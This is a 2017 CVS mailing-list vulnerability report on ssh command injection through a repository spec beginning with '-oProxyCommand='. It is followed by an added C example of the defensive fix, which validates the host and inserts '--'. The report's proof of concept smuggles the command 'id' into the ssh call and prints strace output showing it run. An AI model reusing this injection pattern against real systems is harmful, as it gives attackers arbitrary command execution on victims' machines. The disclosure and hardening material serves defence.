| From | Hank Leininger <hlein@korelogic.com> |
|---|---|
| Newsgroups | gnu.cvs.bug |
| Subject | CVS and ssh command injection (see CVE-2017-1000117, etc.) |
| Date | 2017-08-10 22:19 -0600 |
| Message-ID | <mailman.12931.1502457337.21957.bug-cvs@nongnu.org> (permalink) |
Bugs in Git, Subversion, and Mercurial were just announced & patched
which allowed arbitrary local command execution if a malicious name was
used for the remote server, such as starting with - to pass options to
the ssh client:
```
git clone ssh://-oProxyCommand=some-command...
```
CVS has a similar problem with the -d option:
```
$ strace -f -e execve cvs -d '-oProxyCommand=id;localhost:/bar' co yada 2>&1 | egrep [^pu]id
execve("/usr/bin/cvs", ["cvs", "-d", "-oProxyCommand=id;localhost:/bar", "co", "yada"], 0x7ffe69f75a68 /* 139 vars */) = 0
[snip]
[pid 20003] execve("/usr/local/bin/ssh", ["ssh", "-oProxyCommand=id;localhost", "cvs server"], 0x5fb1fc8420 /* 141 vars */ ) = -1 ENOENT (No such file or directory)
[pid 20003] execve("/usr/bin/ssh", ["ssh", "-oProxyCommand=id;localhost", "cvs server"], 0x5fb1fc8420 /* 141 vars */) = 0
[pid 20004] execve("/bin/bash", ["/bin/bash", "-c", "exec id;localhost"], 0x32af5f10d0 /* 141 vars */) = 0
[pid 20004] execve("/usr/bin/id", ["id"], 0xec92226ae0 /* 141 vars */) = 0
ssh_exchange_identification: Connection closed by remote host
```
Tested vanilla CVS 1.12.13, and Gentoo CVS 1.12.12-r11.
Of course, the repo specification looks very odd, so tricking a victim
may be harder than for SCM tools where it's prefixed by an ssh://, or
masked behind a redirect, or submodule paths may be followed without
user interaction.
See also:
https://marc.info/?l=oss-security&m=150241876103454&w=2
https://marc.info/?l=subversion-announce&m=150238900328980&w=2
https://marc.info/?l=git&m=150238802328673&w=2
https://subversion.apache.org/security/CVE-2017-9800-advisory.txt
Thanks,
--
Hank Leininger <hlein@korelogic.com>
5F6D DCC8 FF53 8093 EC39 127B 091E 7F7C E898 E86C
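The root cause in the strace above is that the host portion of the `-d` argument is handed to ssh as a positional argument and ssh's option parser reads it as `-oProxyCommand=...`. The following is an added example of the defensive check the patched SCM clients applied, written here as illustration and not taken from CVS or from the report: split a `[:ext:][user@]host:/path` spec, refuse a host that begins with `-` (or contains anything outside a conservative hostname character set), and terminate ssh option parsing with `--` before the host. The function names, the `:ext:` handling and the allowed character set are assumptions for this example.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Return 1 if host is acceptable as a positional ssh argument, else 0.
 * Policy (assumed for this example): non-empty, no leading '-', and only
 * characters from [A-Za-z0-9._-@]. A leading '-' is the case from the
 * report: ssh would parse "-oProxyCommand=..." as an option. */
int cvs_host_is_safe(const char *host) {
    if (host == NULL || *host == '\0') return 0;
    if (*host == '-') return 0;
    for (const char *p = host; *p; p++) {
        unsigned char c = (unsigned char)*p;
        if (!(isalnum(c) || c == '.' || c == '-' || c == '_' || c == '@'))
            return 0;
    }
    return 1;
}

/* Split "[:ext:][user@]host:/path" into host and path (caller-supplied
 * buffers). The separator is the first ":/" as in the CVSROOT syntax.
 * Returns 0 on success, -1 if malformed or the buffers are too small. */
int cvsroot_split(const char *root, char *host, size_t hostsz,
                  char *path, size_t pathsz) {
    const char *p = root;
    if (strncmp(p, ":ext:", 5) == 0) p += 5;
    const char *sep = strstr(p, ":/");
    if (sep == NULL) return -1;
    size_t hlen = (size_t)(sep - p);
    if (hlen + 1 > hostsz) return -1;
    memcpy(host, p, hlen);
    host[hlen] = '\0';
    const char *pp = sep + 1;               /* keep the leading '/' */
    if (strlen(pp) + 1 > pathsz) return -1;
    strcpy(path, pp);
    return 0;
}

/* Build the ssh argv a hardened client would exec: reject option-looking
 * hosts, then place "--" before the host so ssh's getopt stops reading
 * options regardless of the host's contents. Returns argc, or -1 when
 * the spec is malformed or the host fails validation. */
int build_ssh_argv(const char *root, const char *argv_out[], int max) {
    static char host[256], path[1024];
    if (cvsroot_split(root, host, sizeof host, path, sizeof path) != 0)
        return -1;
    if (!cvs_host_is_safe(host)) return -1;
    if (max < 5) return -1;
    int n = 0;
    argv_out[n++] = "ssh";
    argv_out[n++] = "--";
    argv_out[n++] = host;
    argv_out[n++] = "cvs server";
    argv_out[n] = NULL;
    return n;
}

int main(void) {
    /* Constructed inputs: the spec from the report and a benign one. */
    const char *specs[] = { "-oProxyCommand=id;localhost:/bar",
                            ":ext:user@cvs.example.org:/var/cvsroot" };
    for (size_t i = 0; i < 2; i++) {
        const char *av[8];
        int n = build_ssh_argv(specs[i], av, 8);
        if (n < 0) { printf("rejected: %s\n", specs[i]); continue; }
        printf("exec:");
        for (int j = 0; j < n; j++) printf(" [%s]", av[j]);
        printf("\n");
    }
    return 0;
}
```

Both checks are deliberately redundant: the character whitelist stops the option-looking host before an exec is ever attempted, and the `--` guards against any future code path that reaches ssh with a host the validator did not see.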